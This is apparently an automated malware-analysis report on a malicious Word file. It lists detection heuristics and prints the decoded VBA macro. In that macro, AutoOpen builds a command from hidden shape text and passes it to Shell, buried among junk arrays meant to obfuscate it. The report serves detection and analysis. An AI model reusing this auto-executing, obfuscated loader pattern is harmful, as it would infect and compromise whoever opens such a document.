MALICIOUS
250
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Divr-6751315-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Divr-6751315-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"Y", "bW", "a", "L", "n", "tG", "cj", "kU") MPFZjT = Shell(YpnQbnTVVT + dJCvrhRI + fNVOOzh, bZzafkKOO) wuRwcSh = Array("v", "OK", "V", "WZ", "d", "qN", "t", "u", _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() SGZOjO = Array("BW", "k", "s", "H", "j", "OQ", "Bq", "mB", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8668 bytes |
SHA-256: fce6ebf063c771f91cbee3e3f31ce6040b6f2d2ac063081a0e8c8adae5382055 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tzwFoUzJdmjSz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LEDjTS()
wBjJHS = Array("oP", "F", "mC", "if", "jQ", "a", "z", "NL", _
"Wr", "R", "A", "fW", "wk", "E", "zq", "qJ", _
"nW", "rt", "Xv", "Zu", "f", "Y", "nW", "YS", _
"D", "vw", "r", "H", "XB", "i", "t", "aD", _
"j", "CE", "nm", "I", "S", "k", "j", "u", _
"vn", "mf", "XF", "j", "u", "w", "Tj", "B", _
"RL", "j", "D", "TR", "CB", "if", "Z", "FX", _
"YV", "H", "q", "U", "k", "R", "i", "Qz")
ftVzcIjL = Array("zB", "HO", "NP", "E", "Sr", "n", "q", "A", _
"Gj", "kW", "aj", "j", "U", "B", "vw", "V", _
"YN", "i", "Q", "di", "lz", "iq", "V", "lc", _
"d", "V", "RK", "Qr", "j", "MI", "dz", "G", _
"wB", "u", "o", "Lj", "AV", "Wv", "hu", "Fw", _
"q", "C", "S", "z", "Ya", "iU", "ub", "d", _
"ij", "R", "w", "Mu", "Cc", "A", "KE", "IV", _
"N", "Ba", "OC", "F", "Y", "Y", "d", "w")
uwZBNuEo = Array("o", "K", "VT", "d", "IV", "s", "US", "C", _
"cM", "wW", "A", "B", "Q", "Yv", "ho", "b", _
"hE", "H", "si", "z", "i", "s", "M", "p", _
"n", "U", "R", "V", "wM", "R", "Kc", "Q", _
"r", "Ui", "wG", "aG", "Sj", "rV", "H", "R", _
"zm", "vR", "jY", "h", "p", "Kz", "Jj", "J", _
"t", "w", "ci", "K", "UE", "ls", "Y", "SG", _
"X", "Z", "c", "Uu", "L", "s", "R", "X")
GcXTOjJP = Array("E", "ZE", "J", "hj", "A", "o", "R", "Xa", _
"Pn", "c", "rq", "UB", "z", "C", "o", "jP", _
"fn", "V", "wd", "F", "f", "IJ", "Uw", "i", _
"Z", "ij", "K", "GT", "aE", "c", "b", "lj", _
"OY", "NV", "qG", "A", "qB", "Y", "J", "Mi", _
"W", "Wf", "jf", "Xt", "Q", "wB", "QK", "Tc", _
"T", "kC", "E", "S", "ZB", "sZ", "i", "zL", _
"i", "h", "O", "X", "t", "k", "j", "f")
Const bZzafkKOO = 804539534 - 804539534
cuZIPzzol = Array("WU", "k", "jd", "OE", "G", "aN", "tn", "I", _
"E", "E", "AR", "NP", "Y", "h", "UM", "I", _
"Ho", "w", "WQ", "vY", "L", "dE", "z", "Ei", _
"j", "w", "oi", "rs", "hf", "B", "vX", "K", _
"Sw", "ML", "uc", "W", "H", "dX", "K", "s", _
"UG", "t", "j", "bV", "a", "tw", "lh", "WC", _
"Tb", "Q", "E", "dR", "Ff", "P", "w", "pi", _
"S", "t", "mN", "hm", "Yv", "zA", "jc", "bs")
uTWkkcu = Array("j", "w", "Fh", "Nu", "LY", "z", "N", "i", _
"k", "NT", "jb", "bF", "l", "pU", "kz", "ER", _
"G", "M", "hB", "PJ", "FZ", "j", "E", "v", _
"CF", "s", "V", "CH", "N", "a", "Uf", "Hq", _
"Zj", "v", "j", "i", "Yj", "mZ", "K", "YE", _
"z", "nz", "Sf", "pE", "w", "v", "T", "Ma", _
"DE", "i", "Zf", "X", "h", "C", "C", "wN", _
"zB", "of", "j", "q", "v", "l", "dU", "jF")
kzsHWYJHA = Array("D", "T", "o", "B", "Z", "oV", "Cs", "lG", _
"tb", "JU", "C", "Mf", "Ri", "at", "d", "P", _
"cd", "I", "O", "p", "m", "DS", "r", "O", _
"vl", "of", "fG", "HJ", "G", "q", "Q", "LB", _
"t", "kw", "wO", "i", "YK", "cd", "nw", "cC", _
"Kj", "fZ", "I", "tJ", "n", "A", "s", "tR", _
"wY", "Hb", "Mb", "Ai", "J", "Z", "A", "X", _
"H", "pP", "ra", "Yv", "o", "L", "mv", "Eo")
FpZjTnzj = Array("m", "J", "nl", "W", "hl", "CX", "V", "ii", _
"oF", "ww", "uj", "PO", "X", "f", "SG", "o", _
"wC", "qE", "R", "K", "EO", "c", "aL", "wq", _
"o", "S", "F", "rk", "j", "u", "p", "D", _
"s", "dc", "l", "F", "r", "HH", "Uz", "J", _
"QZ", "UZ", "G", "mU", "nc", "D", "IN", "Rb", _
"L", "ps", "wG", "wm", "Om", "tS", "F", "q", _
"k", "E", "j", "q", "k", "sO", "O", "i")
YpnQbnTVVT = "" + noYMG + WtqJhAk + Shapes("QGXjFjvCNtkGd").TextFrame.ContainingRange + KlUttQm + nziTc
lRwVIj = Array("u", "K", "fh", "L", "ut", "jS", "Xw", "UZ", _
"G", "H", "D", "aj", "t", "Wt", "c", "E", _
"V", "m", "R", "h", "zz", "zY", "GO", "JD", _
"cz", "bH", "v", "n", "L", "s", "zN", "z", _
"GW", "k", "pX", "K", "i", "T", "S", "X", _
"KB", "E", "A", "li", "d", "ts", "Zw", "L", _
"z", "jf", "sI", "sD", "V", "aL", "TC", "Qv", _
"HQ", "WW", "dt", "D", "K", "YS", "Sh", "zt")
VjvnMz = Array("fv", "W", "D", "S", "D", "CE", "S", "KY", _
"pZ", "u", "mf", "C", "C", "Vk", "Y", "P", _
"H", "uZ", "p", "u", "uD", "k", "b", "U", _
"An", "iw", "E", "P", "S", "sJ", "t", "D", _
"zf", "P", "jK", "KR", "u", "wz", "b", "ci", _
"VS", "zb", "B", "mq", "XP", "v", "Ys", "oU", _
"pq", "r", "vB", "No", "U", "Ni", "Q", "I", _
"Y", "bW", "a", "L", "n", "tG", "cj", "kU")
MPFZjT = Shell(YpnQbnTVVT + dJCvrhRI + fNVOOzh, bZzafkKOO)
wuRwcSh = Array("v", "OK", "V", "WZ", "d", "qN", "t", "u", _
"sY", "X", "U", "tM", "YF", "Wo", "U", "nM", _
"v", "w", "T", "ml", "Yc", "lp", "XS", "qd", _
"iZ", "w", "YB", "v", "j", "Vz", "aD", "jz", _
"i", "w", "z", "oi", "p", "ij", "z", "Xa", _
"l", "jT", "zP", "Aw", "E", "j", "A", "E", _
"t", "MZ", "Pj", "mk", "ff", "X", "d", "Fz", _
"k", "ol", "kp", "O", "w", "wh", "Y", "q")
End Function
Sub AutoOpen()
SGZOjO = Array("BW", "k", "s", "H", "j", "OQ", "Bq", "mB", _
"MA", "C", "w", "pb", "n", "c", "lS", "QK", _
"jj", "Ii", "L", "R", "a", "hY", "AA", "L", _
"t", "fz", "bm", "L", "Oi", "SJ", "DM", "z", _
"jX", "w", "Y", "L", "RY", "w", "CB", "PG", _
"lE", "As", "OP", "zo", "La", "F", "B", "Dj", _
"b", "q", "id", "i", "w", "M", "ip", "D", _
"J", "Mn", "pu", "i", "hz", "CD", "c", "J")
wYRAQjaT = Array("E", "zd", "w", "jS", "vS", "CW", "UF", "nO", _
"M", "Ck", "l", "HZ", "TU", "w", "qz", "Z", _
"D", "G", "R", "u", "w", "wf", "BX", "a", _
"h", "tL", "U", "Kw", "vi", "Z", "M", "vr", _
"St", "WL", "in", "BY", "Pd", "d", "s", "lT", _
"X", "U", "V", "R", "Dc", "q", "n", "X", _
"Yq", "d", "BI", "d", "k", "G", "FP", "W", _
"B", "ZH", "F", "wi", "d", "Zl", "Zv", "d")
LEDjTS
PIATjXN = Array("I", "DG", "F", "Tr", "rr", "ki", "IH", "o", _
"J", "i", "nt", "Sj", "io", "DQ", "Y", "H", _
"s", "h", "L", "ii", "L", "E", "Q", "QZ", _
"lL", "BK", "N", "F", "NE", "vL", "Jn", "HR", _
"P", "s", "F", "P", "E", "w", "av", "q", _
"i", "H", "zQ", "b", "su", "K", "S", "i", _
"ZJ", "zn", "nc", "H", "VQ", "T", "Nz", "W", _
"z", "u", "jU", "u", "ij", "wv", "Wh", "S")
IhOmwYl = Array("Hp", "is", "J", "WP", "t", "f", "JA", "XG", _
"E", "E", "u", "Gi", "hT", "J", "F", "Un", _
"q", "kt", "v", "du", "m", "A", "bC", "vQ", _
"ND", "lh", "js", "h", "f", "EQ", "T", "q", _
"S", "L", "w", "S", "hK", "B", "q", "n", _
"zL", "L", "KN", "Hi", "OM", "iE", "iz", "Yn", _
"X", "L", "Q", "b", "zc", "Uv", "G", "Ew", _
"rj", "R", "b", "zF", "H", "PL", "AG", "D")
bLOwOnSkj = Array("LV", "b", "sJ", "jc", "oC", "j", "V", "T", _
"w", "sq", "UN", "QI", "YW", "tO", "k", "RY", _
"jt", "n", "M", "I", "z", "O", "Md", "w", _
"i", "R", "zF", "O", "V", "lh", "w", "O", _
"Yr", "A", "Hq", "HI", "j", "Hn", "mI", "Iv", _
"V", "Dt", "j", "N", "f", "in", "w", "lJ", _
"Qz", "H", "kd", "FQ", "TF", "L", "Q", "lj", _
"R", "rb", "GT", "dI", "X", "i", "N", "aI")
jUipMPL = Array("f", "GJ", "j", "sG", "Q", "z", "P", "jt", _
"ju", "MU", "zG", "Y", "B", "df", "X", "RA", _
"w", "Gs", "Zj", "F", "I", "Q", "Hv", "m", _
"X", "tT", "CR", "SF", "tP", "ll", "d", "c", _
"S", "AX", "hj", "Y", "I", "z", "kE", "H", _
"aw", "M", "H", "bi", "zR", "Jz", "o", "wz", _
"i", "uo", "rP", "B", "pW", "CV", "c", "PF", _
"E", "Z", "Nr", "Yw", "W", "V", "VU", "i")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.